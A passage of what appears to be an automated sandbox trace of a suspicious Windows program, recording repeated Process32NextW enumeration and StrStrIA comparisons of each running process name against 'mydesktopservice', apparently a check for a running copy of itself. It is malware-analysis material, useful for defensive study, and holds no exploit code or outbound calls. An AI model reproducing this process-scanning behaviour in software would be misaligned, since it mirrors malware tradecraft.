pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.154] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a1e8 [0094.154] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356a1e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.154] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.154] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.154] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.156] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569fd8 [0094.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569fd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.156] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.156] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.156] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0094.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.157] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569f30 [0094.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spoolsv.exe", cchWideChar=-1, lpMultiByteStr=0x3569f30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 12 [0094.157] lstrcpyA (in: lpString1=0x567fabc, lpString2="spoolsv.exe" | out: lpString1="spoolsv.exe") returned="spoolsv.exe" [0094.157] StrStrIA (lpFirst="spoolsv.exe", lpSrch="mydesktopservice") returned 0x0 [0094.157] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.161] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a200 [0094.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x356a200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.161] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.161] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.161] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0094.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.162] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a080 [0094.162] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x356a080, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0094.162] lstrcpyA (in: lpString1=0x567fabc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0094.162] StrStrIA (lpFirst="audiodg.exe", lpSrch="mydesktopservice") returned 0x0 [0094.162] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0094.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0094.163] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356a218 [0094.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sihost.exe", cchWideChar=-1, lpMultiByteStr=0x356a218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 11 [0094.163] lstrcpyA (in: lpString1=0x567fabc, lpString2="sihost.exe" | out: lpString1="sihost.exe") returned="sihost.exe" [0094.163] StrStrIA (lpFirst="sihost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.164] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0094.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.165] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3569f48 [0094.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3569f48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0094.165] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0094.165] StrStrIA (lpFirst="svchost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.165] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0094.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.166] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356a068 [0094.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x356a068, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0094.166] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0094.166] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mydesktopservice") returned 0x0 [0094.166] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0094.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.168] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569f60 [0094.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="explorer.exe", cchWideChar=-1, lpMultiByteStr=0x3569f60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 13 [0094.168] lstrcpyA (in: lpString1=0x567fabc, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0094.168] StrStrIA (lpFirst="explorer.exe", lpSrch="mydesktopservice") returned 0x0 [0094.168] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0094.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.169] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569a08 [0094.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x3569a08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 21 [0094.169] lstrcpyA (in: lpString1=0x567fabc, lpString2="OfficeClickToRun.exe" | out: lpString1="OfficeClickToRun.exe") returned="OfficeClickToRun.exe" [0094.169] StrStrIA (lpFirst="OfficeClickToRun.exe", lpSrch="mydesktopservice") returned 0x0 [0094.169] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0094.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.170] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a4e8 [0094.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SecurityHealthService.exe", cchWideChar=-1, lpMultiByteStr=0x356a4e8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SecurityHealthService.exe", lpUsedDefaultChar=0x0) returned 26 [0094.170] lstrcpyA (in: lpString1=0x567fabc, lpString2="SecurityHealthService.exe" | out: lpString1="SecurityHealthService.exe") returned="SecurityHealthService.exe" [0094.170] StrStrIA (lpFirst="SecurityHealthService.exe", lpSrch="mydesktopservice") returned 0x0 [0094.170] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0094.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.172] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569948 [0094.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="Memory Compression", cchWideChar=-1, lpMultiByteStr=0x3569948, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Memory Compression", lpUsedDefaultChar=0x0) returned 19 [0094.172] lstrcpyA (in: lpString1=0x567fabc, lpString2="Memory Compression" | out: lpString1="Memory Compression") returned="Memory Compression" [0094.172] StrStrIA (lpFirst="Memory Compression", lpSrch="mydesktopservice") returned 0x0 [0094.172] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0094.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0094.173] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x3569968 [0094.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=-1, lpMultiByteStr=0x3569968, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 24 [0094.173] lstrcpyA (in: lpString1=0x567fabc, lpString2="ShellExperienceHost.exe" | out: lpString1="ShellExperienceHost.exe") returned="ShellExperienceHost.exe" [0094.173] StrStrIA (lpFirst="ShellExperienceHost.exe", lpSrch="mydesktopservice") returned 0x0 [0094.173] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0094.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.175] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356a188 [0094.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="SearchUI.exe", cchWideChar=-1, lpMultiByteStr=0x356a188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 13 [0094.175] lstrcpyA (in: lpString1=0x567fabc, lpString2="SearchUI.exe" | out: lpString1="SearchUI.exe") returned="SearchUI.exe" [0094.175] StrStrIA (lpFirst="SearchUI.exe", lpSrch="mydesktopservice") returned 0x0 [0094.175] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0094.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0094.176] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x3569a28 [0094.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="RuntimeBroker.exe", cchWideChar=-1, lpMultiByteStr=0x3569a28, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 18 [0094.176] lstrcpyA (in: lpString1=0x567fabc, lpString2="RuntimeBroker.exe" | out: lpString1="RuntimeBroker.exe") returned="RuntimeBroker.exe" [0094.177] StrStrIA (lpFirst="RuntimeBroker.exe", lpSrch="mydesktopservice") returned 0x0 [0094.177] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0094.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.178] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3569f78 [0094.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3569f78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0094.178] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0094.178] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mydesktopservice") returned 0x0 [0094.178] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pending.exe")) returned 1 [0094.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.179] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356a158 [0094.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pending.exe", cchWideChar=-1, lpMultiByteStr=0x356a158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pending.exe", lpUsedDefaultChar=0x0) returned 12 [0094.179] lstrcpyA (in: lpString1=0x567fabc, lpString2="pending.exe" | out: lpString1="pending.exe") returned="pending.exe" [0094.179] StrStrIA (lpFirst="pending.exe", lpSrch="mydesktopservice") returned 0x0 [0094.179] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="appointmentimpressed.exe")) returned 1 [0094.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.181] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a718 [0094.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="appointmentimpressed.exe", cchWideChar=-1, lpMultiByteStr=0x356a718, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="appointmentimpressed.exe", lpUsedDefaultChar=0x0) returned 25 [0094.181] lstrcpyA (in: lpString1=0x567fabc, lpString2="appointmentimpressed.exe" | out: lpString1="appointmentimpressed.exe") returned="appointmentimpressed.exe" [0094.181] StrStrIA (lpFirst="appointmentimpressed.exe", lpSrch="mydesktopservice") returned 0x0 [0094.181] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="swing prefer.exe")) returned 1 [0094.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0094.182] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3569b68 [0094.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="swing prefer.exe", cchWideChar=-1, lpMultiByteStr=0x3569b68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="swing prefer.exe", lpUsedDefaultChar=0x0) returned 17 [0094.182] lstrcpyA (in: lpString1=0x567fabc, lpString2="swing prefer.exe" | out: lpString1="swing prefer.exe") returned="swing prefer.exe" [0094.182] StrStrIA (lpFirst="swing prefer.exe", lpSrch="mydesktopservice") returned 0x0 [0094.182] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="vietnamese_mature_hat.exe")) returned 1 [0094.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0094.183] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x356a510 [0094.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="vietnamese_mature_hat.exe", cchWideChar=-1, lpMultiByteStr=0x356a510, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vietnamese_mature_hat.exe", lpUsedDefaultChar=0x0) returned 26 [0094.183] lstrcpyA (in: lpString1=0x567fabc, lpString2="vietnamese_mature_hat.exe" | out: lpString1="vietnamese_mature_hat.exe") returned="vietnamese_mature_hat.exe" [0094.184] StrStrIA (lpFirst="vietnamese_mature_hat.exe", lpSrch="mydesktopservice") returned 0x0 [0094.184] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="nights-attending.exe")) returned 1 [0094.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.185] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3569888 [0094.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="nights-attending.exe", cchWideChar=-1, lpMultiByteStr=0x3569888, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nights-attending.exe", lpUsedDefaultChar=0x0) returned 21 [0094.185] lstrcpyA (in: lpString1=0x567fabc, lpString2="nights-attending.exe" | out: lpString1="nights-attending.exe") returned="nights-attending.exe" [0094.185] StrStrIA (lpFirst="nights-attending.exe", lpSrch="mydesktopservice") returned 0x0 [0094.185] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="installed.exe")) returned 1 [0094.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.186] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356a098 [0094.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="installed.exe", cchWideChar=-1, lpMultiByteStr=0x356a098, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="installed.exe", lpUsedDefaultChar=0x0) returned 14 [0094.186] lstrcpyA (in: lpString1=0x567fabc, lpString2="installed.exe" | out: lpString1="installed.exe") returned="installed.exe" [0094.186] StrStrIA (lpFirst="installed.exe", lpSrch="mydesktopservice") returned 0x0 [0094.186] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="references compounds.exe")) returned 1 [0094.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0094.187] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x356a560 [0094.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="references compounds.exe", cchWideChar=-1, lpMultiByteStr=0x356a560, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="references compounds.exe", lpUsedDefaultChar=0x0) returned 25 [0094.188] lstrcpyA (in: lpString1=0x567fabc, 